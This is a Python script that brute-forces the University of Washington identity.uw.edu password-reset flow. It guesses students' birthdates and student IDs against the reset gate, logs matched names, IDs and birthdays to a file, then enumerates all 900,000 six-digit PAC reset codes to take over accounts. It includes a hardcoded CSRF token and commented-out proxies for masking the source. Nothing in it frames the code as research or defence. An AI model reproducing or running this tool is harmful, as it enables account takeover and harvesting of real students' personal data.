# Author:
# Date:
# Description: A Simple Script That Finds Accounts.

from datetime import datetime
import argparse
import requests
import random

# Get Birthday.
# Precondition: A String | Two Lists | A Object | Two Integers
# Postcondition: Save Data.
def get_birthday(netid,student,temp,writer,key,key_add):

    # Local Variable.
    year        = datetime.now().year

    # Session Variables.
    user_agent  = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10"
    data        = {"csrftoken":"RMFjxw6lJznjB213dW33rsEIfWIB5WCdjGF8dDBSnCla8GVYBq7mvjwv7W0uHFIH"}
    # proxies   = {"http":"http://188.27.137.163:30987","https":"https://103.111.83.26:53861"}

    # Create Session.
    session     = requests.session()
    # session.proxies = proxies

    # Create Header.
    header_1    = {"Host":"identity.uw.edu",
                   "User-Agent":"{}".format(user_agent),
                   "Accept":"application/json, text/plain, */*",
                   "Accept-Language":"en-US,en;q=0.5",
                   "Accept-Encoding":"gzip, deflate",
                   "Referer":"https://identity.uw.edu/account/resetpassword/",
                   "X-CSRFToken":"{}".format(data["csrftoken"]),
                   "Connection":"close",
                   "Cookie":"csrftoken={}".format(data["csrftoken"])}

    # GET Request.
    response    = session.get("https://identity.uw.edu/account/resetpassword/api/netid/{}".format(netid),headers=header_1)

    # Store Data.
    data.update(response.json())
    data.pop("csrftoken")
    data.update({"csrftoken":"RMFjxw6lJznjB213dW33rsEIfWIB5WCdjGF8dDBSnCla8GVYBq7mvjwv7W0uHFIH"})
    data.update({"identityuwsession":response.cookies.get_dict()["identityuwsession"]})

    # =========================================================================================================================================================

    # Account Exists.
    if data["has_id"] == True:

        # Create Header.
        header_2    = {"Host":"identity.uw.edu",
                       "User-Agent":"{}".format(user_agent),
                       "Accept":"application/json, text/plain, */*",
                       "Accept-Language":"en-US,en;q=0.5",
                       "Accept-Encoding":"gzip, deflate",
                       "Referer":"https://identity.uw.edu/account/resetpassword/gate",
                       "Content-Type":"application/json;charset=utf-8",
                       "X-CSRFToken":"{}".format(data["csrftoken"]),
                       "Content-Length":"55",
                       "Connection":"close",
                       "Cookie": "csrftoken={}; identityuwsession={}".format(data["csrftoken"],data["identityuwsession"])}

        # Birthday OR Student ID.
        if key == 1:

            # Date Variables.
            months = [value for value in range(1,13)]
            days   = [value for value in range(1,32)]
            years  = sorted([year - value for value in range(22,26)],reverse=True)

            # Generate Ages.
            for year in years:
                for month in months:
                    for day in days:

                        # JSON Data.
                        date     = "{}-{}-{}".format(year,month,day)
                        target   = {"lname":student[-2],"bdate":date,"eidsid":student[-1]}

                        # PUT Request.
                        response = session.put("https://identity.uw.edu/account/resetpassword/api/checkgate/{}".format(netid),headers=header_2,json=target)

                        # Display Data & End Program.
                        if response.status_code == 200:
                            writer.write("Net ID: \t\t\t" + student[0] + "\n")
                            writer.write("Name:\t\t\t\t" + student[-3] + " " + student[-2] + "\n")
                            writer.write("Birthday: \t\t\t" + date + "\n")
                            writer.write("Student ID: \t\t\t" + student[-1] + "\n\n")
                            return

        elif key == 2:

            # Generate Student IDs.
            if key_add == 1:

                # Generate Student IDs (Class Rank -> Input Year Admitted)
                start = int("{}00000".format(str(student[-1])[-2:]))
                end   = int("{}99999".format(str(student[-1])[-2:]))
                ids   = list(set([str(value) for value in random.sample(range(start,end),k=(end-start)) if int(str(value)[2]) <= 7 and int(str(value)[2]) != 0]))
                return ids

            # Test Student IDs.
            elif key_add == 2:

                # Find Student ID.
                count = 0
                random.shuffle(temp)
                random.shuffle(temp)
                random.shuffle(temp)
                for student_id in temp:

                    # PUT Request.
                    response = session.put("https://identity.uw.edu/account/resetpassword/api/checkgate/{}".format(netid),headers=header_2,json={"lname":student[-3],"bdate":student[-2],"eidsid":student_id})

                    # Display Data & End Program.
                    if response.status_code == 200:
                        writer.write("Net ID: \t\t\t" + student[0] + "\n")
                        writer.write("Name:\t\t\t\t" + student[-4] + " " + student[-3] + "\n")
                        writer.write("Birthday: \t\t\t" + student[-2] + "\n")
                        writer.write("Student ID: \t\t\t" + student_id + "\n\n")
                        return

                    # Display Responses.
                    elif count == len(temp)-1:
                        print("{} : {} : ".format(response.status_code,response.content),end="")
                        return

                    # Count Attempts.
                    count += 1

# Find & Save Birthday.
# Precondition: A Integer.
# Postcondition: A File.
def birthdays(key):

  # Read File.
  reader  = open("raw.txt","r")
  content = reader.read().split("\n")
  reader.close()

  # Get Student Data.
  count   = 0
  with open("students.txt","a") as writer:
  
    # Write Data.
    for value in content:
    
      # Raw Student Data.
      raw_student = [element.strip() for element in value.split(" ") if element != ""]
      count += 1

      # Get Additional Data.
      net_id = raw_student[0].strip("@uw.edu").lower()
      print("\n[{}]{}{}\n".format(count,(7 - len("[{}]".format(count))) * " ",net_id))

      # Save Birthday OR Student ID.
      if key == 1:
          get_birthday(net_id,raw_student,[""],writer,key,0)
      elif key == 2:

          # Send 5000 Requests.
          student_ids = get_birthday(net_id,raw_student,[""],writer,key,1)
          total = 0
          for student_id in student_ids:

              # Test Student IDs.
              temp = random.sample(student_ids,k=5000)
              get_birthday(net_id,raw_student,temp,writer,key,2)

              # Remove & Display.
              for value in temp: student_ids.remove(value)
              total += 5000
              print(total)

# Get Data.
# Precondition: Four Strings | A Integer | A List.
# Postcondition: Display Data.
def security(netid,lname,bdate,sid,option,codes):

  # Local Variables.
  purple      = "\033[0;35;20m"
  default     = "\033[0;0;20m"

  # Session Variables.
  user_agent  = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10"
  data        = {"csrftoken":"RMFjxw6lJznjB213dW33rsEIfWIB5WCdjGF8dDBSnCla8GVYBq7mvjwv7W0uHFIH"}
  # proxies   = {"http":"http://188.27.137.163:30987","https":"https://103.111.83.26:53861"}

  # Create Session.
  session           = requests.session()
  # session.proxies = proxies

  # Test Proxy.
  if option == 1:
      response      = session.get("http://httpbin.org/ip")
      print("\n{}origin:{}\n{}\n".format(purple,default,response.text.split("\"")[-2]))

  # =========================================================================================================================================================

  # Create Header.
  header_1  =    {"Host":"identity.uw.edu",
                  "User-Agent":"{}".format(user_agent),
                  "Accept":"application/json, text/plain, */*",
                  "Accept-Language":"en-US,en;q=0.5",
                  "Accept-Encoding":"gzip, deflate",
                  "Referer":"https://identity.uw.edu/account/resetpassword/",
                  "X-CSRFToken":"{}".format(data["csrftoken"]),
                  "Connection":"close",
                  "Cookie":"csrftoken={}".format(data["csrftoken"])}

  # GET Request.
  response  = session.get("https://identity.uw.edu/account/resetpassword/api/netid/{}".format(netid),headers=header_1)

  # Store Data.
  data.update(response.json())
  data.pop("csrftoken")
  data.update({"csrftoken":"RMFjxw6lJznjB213dW33rsEIfWIB5WCdjGF8dDBSnCla8GVYBq7mvjwv7W0uHFIH"})
  data.update({"identityuwsession":response.cookies.get_dict()["identityuwsession"]})

  # Display Data.
  if option == 1:
      for key, value in data.items():
          print(("{}{}:{}\n{}\n".format(purple,key,default,value)))

  # =========================================================================================================================================================

  # Account Exists.
  if data["has_id"] == True:

    # Create Header.
    header_2   = {"Host":"identity.uw.edu",
                  "User-Agent":"{}".format(user_agent),
                  "Accept":"application/json, text/plain, */*",
                  "Accept-Language":"en-US,en;q=0.5",
                  "Accept-Encoding":"gzip, deflate",
                  "Referer":"https://identity.uw.edu/account/resetpassword/gate",
                  "Content-Type":"application/json;charset=utf-8",
                  "X-CSRFToken":"{}".format(data["csrftoken"]),
                  "Content-Length":"55",
                  "Connection":"close",
                  "Cookie": "csrftoken={}; identityuwsession={}".format(data["csrftoken"],data["identityuwsession"])}

    # PUT Request.
    response   = session.put("https://identity.uw.edu/account/resetpassword/api/checkgate/{}".format(netid),headers=header_2,json={"lname":lname,"bdate":bdate,"eidsid":sid})

    # Display New Token.
    new_cookie = response.cookies.get_dict()

    # Create Header.
    header_3   = {"Host": "identity.uw.edu",
                  "User-Agent":"{}".format(user_agent),
                  "Accept":"application/json, text/plain, */*",
                  "Accept-Language":"en-US,en;q=0.5",
                  "Accept-Encoding":"gzip, deflate",
                  "Referer":"https://identity.uw.edu/account/resetpassword/pac",
                  "Content-Type":"application/json;charset=utf-8",
                  "X-CSRFToken":"{}".format(data["csrftoken"]),
                  "Content-Length":"18",
                  "Connection":"close",
                  "Cookie": "csrftoken={}; identityuwsession={}".format(data["csrftoken"],new_cookie["identityuwsession"])}

    # Response 200 OK.
    if response.status_code == 200:

        # Option 1.
        if option == 1:

            # Display Token.
            print("{}identityuwsession:{}".format(purple,default))
            print("{}".format(new_cookie["identityuwsession"]))

            # Display Response.
            print("\n{}response:{}".format(purple,default))
            for element in str(response.content)[3:-2].split(","):
                print(element.strip())

            # Generate Codes.
            print("\n{}attempts:{}".format(purple,default))
            return random.sample(range(100000,1000000),k=900000)

        # Option 2.
        elif option == 2:

            # Randomize List.
            random.shuffle(codes)

            # Get Pac Code.
            count = 0
            for pac_code in codes:

                try:

                    # POST Request.
                    response = session.post("https://identity.uw.edu/account/resetpassword/api/checkpac/",headers=header_3,json={"pac":str(pac_code)})

                    # Response 200 OK.
                    if response.status_code < 400:

                        # Display Code.
                        print("\n{}PAC Code:{}".format(purple,default))
                        print("{}\n".format(pac_code))
                        quit()

                    elif count == len(codes)-1:

                        # Display Data.
                        print("{} : {} : ".format(response.status_code,response.content),end="")
                        return

                except Exception as e:
                    print(str(e))

                # Count Attempts.
                count += 1

# Parse the Command.
# Precondition: None.
# Postcondition: Start Module.
def parse():

    try :

        # Create Object & Format.
        parser = argparse.ArgumentParser(add_help=False)

        # Group & Add Arguments.
        group1 = parser.add_argument_group("options")
        group2 = parser.add_argument_group("additional")
        group1.add_argument("-n",metavar="",help=": Net ID")
        group1.add_argument("-l",metavar="",help=": Last Name")
        group1.add_argument("-b",metavar="",help=": Birthday")
        group1.add_argument("-s",metavar="",help=": Student ID")
        group1.add_argument("-g",metavar="",nargs=1,type=int,help=": Generate Birthdays OR IDS (I/O)")
        group2.add_argument("-h",action="help",default=argparse.SUPPRESS,help=": Display the usage screen")

        # Join & Create Arguments.
        args = parser.parse_args()

        # If the Correct Command.
        if args.g:

            # Processing Data.
            birthdays(args.g[0])

        elif (args.n and args.l) and (args.b and args.s):

            # Processing Data.
            codes = security(args.n,args.l,args.b,args.s,1,[])

            # Send 5000 Requests.
            total = 0
            for code in codes:

		# Test Codes.
                temp = random.sample(codes,k=5000)
                security(args.n,args.l,args.b,args.s,2,temp)

		# Remove & Display.
                for value in temp: codes.remove(value)
                total += 5000
                print(total)

        else:
            parser.print_help()

    except Exception as e:
        print(str(e))


# Execute the Program.
if __name__ == "__main__":
    parse()